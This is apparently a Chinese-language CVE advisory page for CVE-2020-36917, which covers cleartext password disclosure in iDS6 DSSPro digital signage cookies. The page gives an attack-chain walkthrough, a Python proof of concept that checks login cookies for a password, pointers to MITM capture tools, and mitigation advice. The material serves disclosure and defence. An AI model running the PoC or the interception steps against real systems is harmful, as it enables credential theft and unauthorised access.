IPBUF安全漏洞报告
English
CVE-2020-36917 CVSS 7.5 高危

CVE-2020-36917 | iDS6 DSSPro数字标牌系统明文Cookie密码泄露漏洞

披露日期: 2026-01-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2020-36917
漏洞类型
敏感信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
iDS6 DSSPro Digital Signage System 6.2

相关标签

CVE-2020-36917敏感信息泄露明文传输中间人攻击Cookie安全iDS6 DSSPro数字标牌系统密码泄露HTTP协议autoSave

漏洞概述

CVE-2020-36917是iDS6 DSSPro数字标牌系统6.2版本中存在的一个高危敏感信息泄露漏洞。该漏洞允许远程攻击者通过拦截HTTP通信中的明文Cookie传输,获取用户的认证凭据信息。系统在使用autoSave(自动保存)功能时,会将用户密码以明文形式存储在Cookie中传输,这在未加密的HTTP通信环境下极易被中间人攻击者窃取。由于该漏洞不需要任何认证即可被利用,攻击者只需处于网络通信路径中即可实施攻击,成功利用后可获取系统管理员或普通用户的登录凭据,进而可能获得对数字标牌系统的完全控制权。此漏洞影响系统的机密性,可能导致敏感业务信息泄露和未授权访问风险。

技术细节

漏洞根源在于iDS6 DSSPro系统的autoSave功能实现存在严重的安全设计缺陷。当用户在登录界面使用自动保存功能时,系统会将用户输入的密码以明文形式存储在HTTP Cookie中,并通过未加密的HTTP通道传输。在标准的安全实践中,敏感凭据应当使用HTTPS加密传输,且密码应经过哈希处理后传输或使用更安全的认证机制。然而该系统在设计时忽略了这些基本安全原则,直接将明文密码写入Cookie。在中间人攻击场景中,攻击者只需在用户与服务器之间的网络路径上监听HTTP流量,即可捕获包含明文密码的Cookie。一旦获取到有效凭据,攻击者可以冒充合法用户登录系统,进而访问、更改数字标牌内容或获取其他敏感信息。由于系统默认使用HTTP而非HTTPS,进一步加剧了此漏洞的严重性。攻击者无需任何前置条件或特殊权限即可发起攻击。

攻击链分析

STEP 1
步骤1
攻击者处于目标用户与iDS6 DSSPro服务器之间的网络路径上,准备进行中间人攻击
STEP 2
步骤2
用户通过HTTP协议访问iDS6 DSSPro系统的登录页面,并使用autoSave功能登录
STEP 3
步骤3
系统在用户登录时将明文密码写入Cookie,并通过未加密的HTTP通道传输
STEP 4
步骤4
攻击者利用中间人攻击技术拦截HTTP流量,捕获包含明文密码的Cookie
STEP 5
步骤5
攻击者提取Cookie中的明文密码,使用获取的凭据登录系统
STEP 6
步骤6
攻击者获得系统完全控制权,可窃取数据、篡改数字标牌内容或横向移动

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import re # CVE-2020-36917 PoC - iDS6 DSSPro Cleartext Cookie Password Disclosure # Target: iDS6 DSSPro Digital Signage System # This PoC demonstrates credential interception via HTTP traffic sniffing def exploit_cve_2020_36917(target_url): """ Exploit function to demonstrate the vulnerability In real attack scenario, credentials would be captured via MITM """ print(f"[*] Target: {target_url}") print(f"[*] Vulnerability: Cleartext Cookie Password Disclosure (CVE-2020-36917)") # Step 1: Attempt to access the login page login_page = f"{target_url}/login" response = requests.get(login_page, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Login page accessible: {login_page}") # Step 2: Check for autoSave feature presence if 'autoSave' in response.text or 'autosave' in response.text: print("[+] AutoSave feature detected in login form") # Step 3: Simulate login request to observe Cookie behavior login_data = { 'username': 'admin', 'password': 'test_password', 'autoSave': 'on' } login_response = requests.post( f"{target_url}/api/login", data=login_data, allow_redirects=False ) # Step 4: Check for cleartext credentials in cookies cookies = login_response.cookies for cookie_name, cookie_value in cookies.items(): if 'password' in cookie_name.lower() or 'pwd' in cookie_name.lower(): print(f"[!] VULNERABLE: Cleartext password found in cookie '{cookie_name}'") print(f"[!] Value: {cookie_value}") return True print("[-] No cleartext password found in cookies") return False else: print(f"[-] Failed to access login page") return False if __name__ == "__main__": target = "http://target-ids6-dsspro.local" exploit_cve_2020_36917(target) print("\n[*] Note: For actual exploitation, perform MITM attack on HTTP traffic") print("[*] Use tools like Wireshark or Ettercap to capture cookies with passwords")

影响范围

iDS6 DSSPro Digital Signage System 6.2

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时缓解措施:1) 强制所有用户使用HTTPS访问系统,禁用HTTP访问;2) 暂时禁用autoSave功能,避免明文密码被写入Cookie;3) 在网络边界部署SSL/TLS解密设备,监控可疑的凭证传输行为;4) 实施双因素认证,即使凭据泄露也能保护账户安全;5) 加强网络监控,及时发现和响应异常访问行为;6) 考虑使用VPN建立安全通道访问系统。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表